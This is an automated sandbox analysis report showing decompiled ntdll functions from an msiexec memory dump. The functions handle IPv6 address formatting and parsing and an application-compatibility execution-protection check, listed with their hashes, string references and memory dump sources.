                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: _wcspbrk
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 402402107-258546922
                                            • Opcode ID: 2c4a5db121e64d99e2db506aa9daf3556de656b789161f5ad3b4fc2a13f28e73
                                            • Instruction ID: b9ca55ac6306de3dee3598ba66eee94cca12b4be223d7d8681085b4fcd804e91
                                            • Opcode Fuzzy Hash: 2c4a5db121e64d99e2db506aa9daf3556de656b789161f5ad3b4fc2a13f28e73
                                            • Instruction Fuzzy Hash: 65F1D7B2D00209EFCF12EF99C9849EEBBB9FF08304F14446AE505A7211E735AA45DF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 38%
                                            			E027513CB(intOrPtr* _a4, intOrPtr _a8) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr* _v16;
                                            				intOrPtr _v20;
                                            				char _v24;
                                            				intOrPtr _t71;
                                            				signed int _t78;
                                            				signed int _t86;
                                            				char _t90;
                                            				signed int _t91;
                                            				signed int _t96;
                                            				intOrPtr _t108;
                                            				signed int _t114;
                                            				void* _t115;
                                            				intOrPtr _t128;
                                            				intOrPtr* _t129;
                                            				void* _t130;
                                            
                                            				_t129 = _a4;
                                            				_t128 = _a8;
                                            				_t116 = 0;
                                            				_t71 = _t128 + 0x5c;
                                            				_v8 = 8;
                                            				_v20 = _t71;
                                            				if( *_t129 == 0) {
                                            					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                            						goto L5;
                                            					} else {
                                            						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                            						if(_t96 != 0) {
                                            							L38:
                                            							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                            								goto L5;
                                            							} else {
                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                            								_t86 = E02747707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                            								L36:
                                            								return _t128 + _t86 * 2;
                                            							}
                                            						}
                                            						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                            						if(_t114 == 0) {
                                            							L33:
                                            							_t115 = 0x2712926;
                                            							L35:
                                            							_push( *(_t129 + 0xf) & 0x000000ff);
                                            							_push( *(_t129 + 0xe) & 0x000000ff);
                                            							_push( *(_t129 + 0xd) & 0x000000ff);
                                            							_push( *(_t129 + 0xc) & 0x000000ff);
                                            							_t86 = E02747707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                            							goto L36;
                                            						}
                                            						if(_t114 != 0xffff) {
                                            							_t116 = 0;
                                            							goto L38;
                                            						}
                                            						if(_t114 != 0) {
                                            							_t115 = 0x2719cac;
                                            							goto L35;
                                            						}
                                            						goto L33;
                                            					}
                                            				} else {
                                            					L5:
                                            					_a8 = _t116;
                                            					_a4 = _t116;
                                            					_v12 = _t116;
                                            					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                            						if( *(_t129 + 0xa) == 0xfe5e) {
                                            							_v8 = 6;
                                            						}
                                            					}
                                            					_t90 = _v8;
                                            					if(_t90 <= _t116) {
                                            						L11:
                                            						if(_a8 - _a4 <= 1) {
                                            							_a8 = _t116;
                                            							_a4 = _t116;
                                            						}
                                            						_t91 = 0;
                                            						if(_v8 <= _t116) {
                                            							L22:
                                            							if(_v8 < 8) {
                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                            								_t128 = _t128 + E02747707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                            							}
                                            							return _t128;
                                            						} else {
                                            							L14:
                                            							L14:
                                            							if(_a4 > _t91 || _t91 >= _a8) {
                                            								if(_t91 != _t116 && _t91 != _a8) {
                                            									_push(":");
                                            									_push(_t71 - _t128 >> 1);
                                            									_push(_t128);
                                            									_t128 = _t128 + E02747707() * 2;
                                            									_t71 = _v20;
                                            									_t130 = _t130 + 0xc;
                                            								}
                                            								_t78 = E02747707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                            								_t130 = _t130 + 0x10;
                                            							} else {
                                            								_push(L"::");
                                            								_push(_t71 - _t128 >> 1);
                                            								_push(_t128);
                                            								_t78 = E02747707();
                                            								_t130 = _t130 + 0xc;
                                            								_t91 = _a8 - 1;
                                            							}
                                            							_t91 = _t91 + 1;
                                            							_t128 = _t128 + _t78 * 2;
                                            							_t71 = _v20;
                                            							if(_t91 >= _v8) {
                                            								goto L22;
                                            							}
                                            							_t116 = 0;
                                            							goto L14;
                                            						}
                                            					} else {
                                            						_t108 = 1;
                                            						_v16 = _t129;
                                            						_v24 = _t90;
                                            						do {
                                            							if( *_v16 == _t116) {
                                            								if(_t108 - _v12 > _a8 - _a4) {
                                            									_a4 = _v12;
                                            									_a8 = _t108;
                                            								}
                                            								_t116 = 0;
                                            							} else {
                                            								_v12 = _t108;
                                            							}
                                            							_v16 = _v16 + 2;
                                            							_t108 = _t108 + 1;
                                            							_t26 =  &_v24;
                                            							 *_t26 = _v24 - 1;
                                            						} while ( *_t26 != 0);
                                            						goto L11;
                                            					}
                                            				}
                                            			}




















                                            0x027513d5
                                            0x027513d9
                                            0x027513dc
                                            0x027513de
                                            0x027513e1
                                            0x027513e8
                                            0x027513ee
                                            0x0277e8fd
                                            0x00000000
                                            0x0277e921
                                            0x0277e921
                                            0x0277e928
                                            0x0277e982
                                            0x0277e98a
                                            0x00000000
                                            0x0277e99a
                                            0x0277e99e
                                            0x0277e9a3
                                            0x0277e9a8
                                            0x0277e9b9
                                            0x0277e978
                                            0x00000000
                                            0x0277e978
                                            0x0277e98a
                                            0x0277e92a
                                            0x0277e931
                                            0x0277e944
                                            0x0277e944
                                            0x0277e950
                                            0x0277e954
                                            0x0277e959
                                            0x0277e95e
                                            0x0277e963
                                            0x0277e970
                                            0x00000000
                                            0x0277e975
                                            0x0277e93b
                                            0x0277e980
                                            0x00000000
                                            0x0277e980
                                            0x0277e942
                                            0x0277e94b
                                            0x00000000
                                            0x0277e94b
                                            0x00000000
                                            0x0277e942
                                            0x027513f4
                                            0x027513f4
                                            0x027513f9
                                            0x027513fc
                                            0x027513ff
                                            0x02751406
                                            0x0277e9cc
                                            0x0277e9d2
                                            0x0277e9d2
                                            0x0277e9cc
                                            0x0275140c
                                            0x02751411
                                            0x02751431
                                            0x0275143a
                                            0x0275143c
                                            0x0275143f
                                            0x0275143f
                                            0x02751442
                                            0x02751447
                                            0x027514a8
                                            0x027514ac
                                            0x0277e9e2
                                            0x0277e9e7
                                            0x0277e9ec
                                            0x0277ea05
                                            0x0277ea05
                                            0x00000000
                                            0x02751449
                                            0x00000000
                                            0x02751449
                                            0x0275144c
                                            0x02751459
                                            0x02751462
                                            0x02751469
                                            0x0275146a
                                            0x02751470
                                            0x02751473
                                            0x02751476
                                            0x02751476
                                            0x02751490
                                            0x02751495
                                            0x0275138e
                                            0x02751390
                                            0x02751397
                                            0x02751398
                                            0x02751399
                                            0x027513a1
                                            0x027513a4
                                            0x027513a4
                                            0x02751498
                                            0x0275149c
                                            0x0275149f
                                            0x027514a2
                                            0x00000000
                                            0x00000000
                                            0x027514a4
                                            0x00000000
                                            0x027514a4
                                            0x02751413
                                            0x02751415
                                            0x02751416
                                            0x02751419
                                            0x0275141c
                                            0x02751422
                                            0x027513b7
                                            0x027513bc
                                            0x027513bf
                                            0x027513bf
                                            0x027513c2
                                            0x02751424
                                            0x02751424
                                            0x02751424
                                            0x02751427
                                            0x0275142b
                                            0x0275142c
                                            0x0275142c
                                            0x0275142c
                                            0x00000000
                                            0x0275141c
                                            0x02751411

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 245c1b1f2a73fc75af8710e321fa2df9368ca294bd7d937819c66727780be433
                                            • Instruction ID: 0b0bc5bf0b9079486c4df87f8a2b88706f4c99afedd7b76b4847e2f44d89de99
                                            • Opcode Fuzzy Hash: 245c1b1f2a73fc75af8710e321fa2df9368ca294bd7d937819c66727780be433
                                            • Instruction Fuzzy Hash: 3B6136B1D00665EACF25CF59C890ABFFBB6EF84302B84C06DE9DA47540D7B4A640CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E02747EFD(void* __ecx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				char _v540;
                                            				unsigned int _v544;
                                            				signed int _v548;
                                            				intOrPtr _v552;
                                            				char _v556;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t33;
                                            				void* _t38;
                                            				unsigned int _t46;
                                            				unsigned int _t47;
                                            				unsigned int _t52;
                                            				intOrPtr _t56;
                                            				unsigned int _t62;
                                            				void* _t69;
                                            				void* _t70;
                                            				intOrPtr _t72;
                                            				signed int _t73;
                                            				void* _t74;
                                            				void* _t75;
                                            				void* _t76;
                                            				void* _t77;
                                            
                                            				_t33 =  *0x27f2088; // 0x766d5afb
                                            				_v8 = _t33 ^ _t73;
                                            				_v548 = _v548 & 0x00000000;
                                            				_t72 = _a4;
                                            				if(E02747F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                            					__eflags = _v548;
                                            					if(_v548 == 0) {
                                            						goto L1;
                                            					}
                                            					_t62 = _t72 + 0x24;
                                            					E02763F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                            					_t71 = 0x214;
                                            					_v544 = 0x214;
                                            					E0271DFC0( &_v540, 0, 0x214);
                                            					_t75 = _t74 + 0x20;
                                            					_t46 =  *0x27f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                            					__eflags = _t46;
                                            					if(_t46 == 0) {
                                            						goto L1;
                                            					}
                                            					_t47 = _v544;
                                            					__eflags = _t47;
                                            					if(_t47 == 0) {
                                            						goto L1;
                                            					}
                                            					__eflags = _t47 - 0x214;
                                            					if(_t47 >= 0x214) {
                                            						goto L1;
                                            					}
                                            					_push(_t62);
                                            					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                            					E02763F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                            					_t52 = E02720D27( &_v540, L"Execute=1");
                                            					_t76 = _t75 + 0x1c;
                                            					_push(_t62);
                                            					__eflags = _t52;
                                            					if(_t52 == 0) {
                                            						E02763F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                            						_t71 =  &_v540;
                                            						_t56 = _t73 + _v544 - 0x218;
                                            						_t77 = _t76 + 0x14;
                                            						_v552 = _t56;
                                            						__eflags = _t71 - _t56;
                                            						if(_t71 >= _t56) {
                                            							goto L1;
                                            						} else {
                                            							goto L10;
                                            						}
                                            						while(1) {
                                            							L10:
                                            							_t62 = E02728375(_t71, 0x20);
                                            							_pop(_t69);
                                            							__eflags = _t62;
                                            							if(__eflags != 0) {
                                            								__eflags = 0;
                                            								 *_t62 = 0;
                                            							}
                                            							E02763F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                            							_t77 = _t77 + 0x10;
                                            							E0278E8DB(_t69, _t70, __eflags, _t72, _t71);
                                            							__eflags = _t62;
                                            							if(_t62 == 0) {
                                            								goto L1;
                                            							}
                                            							_t31 = _t62 + 2; // 0x2
                                            							_t71 = _t31;
                                            							__eflags = _t71 - _v552;
                                            							if(_t71 >= _v552) {
                                            								goto L1;
                                            							}
                                            						}
                                            					}
                                            					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                            					_push(3);
                                            					_push(0x55);
                                            					E02763F92();
                                            					_t38 = 1;
                                            					L2:
                                            					return E0271E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                            				}
                                            				L1:
                                            				_t38 = 0;
                                            				goto L2;
                                            			}



























                                            0x02747f08
                                            0x02747f0f
                                            0x02747f12
                                            0x02747f1b
                                            0x02747f31
                                            0x02763ead
                                            0x02763eb4
                                            0x00000000
                                            0x00000000
                                            0x02763eba
                                            0x02763ecd
                                            0x02763ed2
                                            0x02763ee1
                                            0x02763ee7
                                            0x02763eec
                                            0x02763f12
                                            0x02763f18
                                            0x02763f1a
                                            0x00000000
                                            0x00000000
                                            0x02763f20
                                            0x02763f26
                                            0x02763f28
                                            0x00000000
                                            0x00000000
                                            0x02763f2e
                                            0x02763f30
                                            0x00000000
                                            0x00000000
                                            0x02763f3a
                                            0x02763f3b
                                            0x02763f53
                                            0x02763f64
                                            0x02763f69
                                            0x02763f6c
                                            0x02763f6d
                                            0x02763f6f
                                            0x0276e304
                                            0x0276e30f
                                            0x0276e315
                                            0x0276e31e
                                            0x0276e321
                                            0x0276e327
                                            0x0276e329
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0276e32f
                                            0x0276e32f
                                            0x0276e337
                                            0x0276e33a
                                            0x0276e33b
                                            0x0276e33d
                                            0x0276e33f
                                            0x0276e341
                                            0x0276e341
                                            0x0276e34e
                                            0x0276e353
                                            0x0276e358
                                            0x0276e35d
                                            0x0276e35f
                                            0x00000000
                                            0x00000000
                                            0x0276e365
                                            0x0276e365
                                            0x0276e368
                                            0x0276e36e
                                            0x00000000
                                            0x00000000
                                            0x0276e374
                                            0x0276e32f
                                            0x02763f75
                                            0x02763f7a
                                            0x02763f7c
                                            0x02763f7e
                                            0x02763f86
                                            0x02747f39
                                            0x02747f47
                                            0x02747f47
                                            0x02747f37
                                            0x02747f37
                                            0x00000000

                                            APIs
                                            • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02763F12
                                            Strings
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0276E2FB
                                            • ExecuteOptions, xrefs: 02763F04
                                            • Execute=1, xrefs: 02763F5E
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02763EC4
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 0276E345
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02763F75
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02763F4A
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: BaseDataModuleQuery
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 3901378454-484625025
                                            • Opcode ID: 15189e88058c32266001e43af66f6bb1cfbef6775b96d14ad9923ea565dd66bd
                                            • Instruction ID: 4864f64db7a9299605e4ea41911b14c67d51776e3ad239a1b9386052080d74d9
                                            • Opcode Fuzzy Hash: 15189e88058c32266001e43af66f6bb1cfbef6775b96d14ad9923ea565dd66bd
                                            • Instruction Fuzzy Hash: 3341DA7168061C7FEB219A94DCCDFEBB3BDAF15704F0005A9EA05E6081EB709A45CF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E02750B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				void* _t108;
                                            				void* _t116;
                                            				char _t120;
                                            				short _t121;
                                            				void* _t128;
                                            				intOrPtr* _t130;
                                            				char _t132;
                                            				short _t133;
                                            				intOrPtr _t141;
                                            				signed int _t156;
                                            				signed int _t174;
                                            				intOrPtr _t177;
                                            				intOrPtr* _t179;
                                            				intOrPtr _t180;
                                            				void* _t183;
                                            
                                            				_t179 = _a4;
                                            				_t141 =  *_t179;
                                            				_v16 = 0;
                                            				_v28 = 0;
                                            				_v8 = 0;
                                            				_v24 = 0;
                                            				_v12 = 0;
                                            				_v32 = 0;
                                            				_v20 = 0;
                                            				if(_t141 == 0) {
                                            					L41:
                                            					 *_a8 = _t179;
                                            					_t180 = _v24;
                                            					if(_t180 != 0) {
                                            						if(_t180 != 3) {
                                            							goto L6;
                                            						}
                                            						_v8 = _v8 + 1;
                                            					}
                                            					_t174 = _v32;
                                            					if(_t174 == 0) {
                                            						if(_v8 == 7) {
                                            							goto L43;
                                            						}
                                            						goto L6;
                                            					}
                                            					L43:
                                            					if(_v16 != 1) {
                                            						if(_v16 != 2) {
                                            							goto L6;
                                            						}
                                            						 *((short*)(_a12 + _v20 * 2)) = 0;
                                            						L47:
                                            						if(_t174 != 0) {
                                            							E02728980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                            							_t116 = 8;
                                            							E0271DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                            						}
                                            						return 0;
                                            					}
                                            					if(_t180 != 0) {
                                            						if(_v12 > 3) {
                                            							goto L6;
                                            						}
                                            						_t120 = E02750CFA(_v28, 0, 0xa);
                                            						_t183 = _t183 + 0xc;
                                            						if(_t120 > 0xff) {
                                            							goto L6;
                                            						}
                                            						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                            						goto L47;
                                            					}
                                            					if(_v12 > 4) {
                                            						goto L6;
                                            					}
                                            					_t121 = E02750CFA(_v28, _t180, 0x10);
                                            					_t183 = _t183 + 0xc;
                                            					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                            					goto L47;
                                            				} else {
                                            					while(1) {
                                            						_t123 = _v16;
                                            						if(_t123 == 0) {
                                            							goto L7;
                                            						}
                                            						_t108 = _t123 - 1;
                                            						if(_t108 != 0) {
                                            							goto L1;
                                            						}
                                            						_t178 = _t141;
                                            						if(E027506BA(_t108, _t141) == 0 || _t135 == 0) {
                                            							if(E027506BA(_t135, _t178) == 0 || E02750A5B(_t136, _t178) == 0) {
                                            								if(_t141 != 0x3a) {
                                            									if(_t141 == 0x2e) {
                                            										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                            											goto L41;
                                            										} else {
                                            											_v24 = _v24 + 1;
                                            											L27:
                                            											_v16 = _v16 & 0x00000000;
                                            											L28:
                                            											if(_v28 == 0) {
                                            												goto L20;
                                            											}
                                            											_t177 = _v24;
                                            											if(_t177 != 0) {
                                            												if(_v12 > 3) {
                                            													L6:
                                            													return 0xc000000d;
                                            												}
                                            												_t132 = E02750CFA(_v28, 0, 0xa);
                                            												_t183 = _t183 + 0xc;
                                            												if(_t132 > 0xff) {
                                            													goto L6;
                                            												}
                                            												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                            												goto L20;
                                            											}
                                            											if(_v12 > 4) {
                                            												goto L6;
                                            											}
                                            											_t133 = E02750CFA(_v28, 0, 0x10);
                                            											_t183 = _t183 + 0xc;
                                            											_v20 = _v20 + 1;
                                            											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                            											goto L20;
                                            										}
                                            									}
                                            									goto L41;
                                            								}
                                            								if(_v24 > 0 || _v8 > 6) {
                                            									goto L41;
                                            								} else {
                                            									_t130 = _t179 + 1;
                                            									if( *_t130 == _t141) {
                                            										if(_v32 != 0) {
                                            											goto L41;
                                            										}
                                            										_v32 = _v8 + 1;
                                            										_t156 = 2;
                                            										_v8 = _v8 + _t156;
                                            										L34:
                                            										_t179 = _t130;
                                            										_v16 = _t156;
                                            										goto L28;
                                            									}
                                            									_v8 = _v8 + 1;
                                            									goto L27;
                                            								}
                                            							} else {
                                            								_v12 = _v12 + 1;
                                            								if(_v24 > 0) {
                                            									goto L41;
                                            								}
                                            								_a7 = 1;
                                            								goto L20;
                                            							}
                                            						} else {
                                            							_v12 = _v12 + 1;
                                            							L20:
                                            							_t179 = _t179 + 1;
                                            							_t141 =  *_t179;
                                            							if(_t141 == 0) {
                                            								goto L41;
                                            							}
                                            							continue;
                                            						}
                                            						L7:
                                            						if(_t141 == 0x3a) {
                                            							if(_v24 > 0 || _v8 > 0) {
                                            								goto L41;
                                            							} else {
                                            								_t130 = _t179 + 1;
                                            								if( *_t130 != _t141) {
                                            									goto L41;
                                            								}
                                            								_v20 = _v20 + 1;
                                            								_t156 = 2;
                                            								_v32 = 1;
                                            								_v8 = _t156;
                                            								 *((short*)(_a12 + _v20 * 2)) = 0;
                                            								goto L34;
                                            							}
                                            						}
                                            						L8:
                                            						if(_v8 > 7) {
                                            							goto L41;
                                            						}
                                            						_t142 = _t141;
                                            						if(E027506BA(_t123, _t141) == 0 || _t124 == 0) {
                                            							if(E027506BA(_t124, _t142) == 0 || E02750A5B(_t125, _t142) == 0 || _v24 > 0) {
                                            								goto L41;
                                            							} else {
                                            								_t128 = 1;
                                            								_a7 = 1;
                                            								_v28 = _t179;
                                            								_v16 = 1;
                                            								_v12 = 1;
                                            								L39:
                                            								if(_v16 == _t128) {
                                            									goto L20;
                                            								}
                                            								goto L28;
                                            							}
                                            						} else {
                                            							_a7 = 0;
                                            							_v28 = _t179;
                                            							_v16 = 1;
                                            							_v12 = 1;
                                            							goto L20;
                                            						}
                                            					}
                                            				}
                                            				L1:
                                            				_t123 = _t108 == 1;
                                            				if(_t108 == 1) {
                                            					goto L8;
                                            				}
                                            				_t128 = 1;
                                            				goto L39;
                                            			}

























                                            0x02750b21
                                            0x02750b24
                                            0x02750b27
                                            0x02750b2a
                                            0x02750b2d
                                            0x02750b30
                                            0x02750b33
                                            0x02750b36
                                            0x02750b39
                                            0x02750b3e
                                            0x02750c65
                                            0x02750c68
                                            0x02750c6a
                                            0x02750c6f
                                            0x0277eb42
                                            0x00000000
                                            0x00000000
                                            0x0277eb48
                                            0x0277eb48
                                            0x02750c75
                                            0x02750c7a
                                            0x0277eb54
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0277eb5a
                                            0x02750c80
                                            0x02750c84
                                            0x0277eb98
                                            0x00000000
                                            0x00000000
                                            0x0277eba6
                                            0x02750cb8
                                            0x02750cba
                                            0x02750cd3
                                            0x02750cda
                                            0x02750ce4
                                            0x02750ce9
                                            0x00000000
                                            0x02750cec
                                            0x02750c8c
                                            0x0277eb63
                                            0x00000000
                                            0x00000000
                                            0x0277eb70
                                            0x0277eb75
                                            0x0277eb7d
                                            0x00000000
                                            0x00000000
                                            0x0277eb8c
                                            0x00000000
                                            0x0277eb8c
                                            0x02750c96
                                            0x00000000
                                            0x00000000
                                            0x02750ca2
                                            0x02750cac
                                            0x02750cb4
                                            0x00000000
                                            0x00000000
                                            0x02750b44
                                            0x02750b47
                                            0x02750b49
                                            0x00000000
                                            0x00000000
                                            0x02750b4f
                                            0x02750b50
                                            0x00000000
                                            0x00000000
                                            0x02750b56
                                            0x02750b62
                                            0x02750b7c
                                            0x02750bac
                                            0x02750a0f
                                            0x0277eaaa
                                            0x00000000
                                            0x0277eac4
                                            0x0277eac4
                                            0x02750bd0
                                            0x02750bd0
                                            0x02750bd4
                                            0x02750bd9
                                            0x00000000
                                            0x00000000
                                            0x02750bdb
                                            0x02750be0
                                            0x0277eb0e
                                            0x02750a1a
                                            0x00000000
                                            0x02750a1a
                                            0x0277eb1a
                                            0x0277eb1f
                                            0x0277eb27
                                            0x00000000
                                            0x00000000
                                            0x0277eb36
                                            0x00000000
                                            0x0277eb36
                                            0x02750bea
                                            0x00000000
                                            0x00000000
                                            0x02750bf6
                                            0x02750c00
                                            0x02750c03
                                            0x02750c0b
                                            0x00000000
                                            0x02750c0b
                                            0x0277eaaa
                                            0x00000000
                                            0x02750a15
                                            0x02750bb6
                                            0x00000000
                                            0x02750bc6
                                            0x02750bc6
                                            0x02750bcb
                                            0x02750c15
                                            0x00000000
                                            0x00000000
                                            0x02750c1d
                                            0x02750c20
                                            0x02750c21
                                            0x02750c24
                                            0x02750c24
                                            0x02750c26
                                            0x00000000
                                            0x02750c26
                                            0x02750bcd
                                            0x00000000
                                            0x02750bcd
                                            0x02750b89
                                            0x02750b89
                                            0x02750b90
                                            0x00000000
                                            0x00000000
                                            0x02750b96
                                            0x00000000
                                            0x02750b96
                                            0x02750a04
                                            0x02750a04
                                            0x02750b9a
                                            0x02750b9a
                                            0x02750b9b
                                            0x02750b9f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x02750ba5
                                            0x02750ac7
                                            0x02750aca
                                            0x0277eacf
                                            0x00000000
                                            0x0277eade
                                            0x0277eade
                                            0x0277eae3
                                            0x00000000
                                            0x00000000
                                            0x0277eaf3
                                            0x0277eaf6
                                            0x0277eaf7
                                            0x0277eafe
                                            0x0277eb01
                                            0x00000000
                                            0x0277eb01
                                            0x0277eacf
                                            0x02750ad0
                                            0x02750ad4
                                            0x00000000
                                            0x00000000
                                            0x02750ada
                                            0x02750ae6
                                            0x02750c34
                                            0x00000000
                                            0x02750c47
                                            0x02750c49
                                            0x02750c4a
                                            0x02750c4e
                                            0x02750c51
                                            0x02750c54
                                            0x02750c57
                                            0x02750c5a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x02750c60
                                            0x02750afb
                                            0x02750afe
                                            0x02750b02
                                            0x02750b05
                                            0x02750b08
                                            0x00000000
                                            0x02750b08
                                            0x02750ae6
                                            0x02750b44
                                            0x027509f8
                                            0x027509f8
                                            0x027509f9
                                            0x00000000
                                            0x00000000
                                            0x0277eaa0
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: __fassign
                                            • String ID: .$:$:
                                            • API String ID: 3965848254-2308638275
                                            • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                            • Instruction ID: f38a135da8b40d06a55cdb277ff8273d628f76c481b3a522f05be0642ac69e1a
                                            • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                            • Instruction Fuzzy Hash: D6A18C7590126ADFCF25CF68C8446FEF7B5AF0A308F24846ADC42B7240E7B09A45CB95
                                            Uniqueness

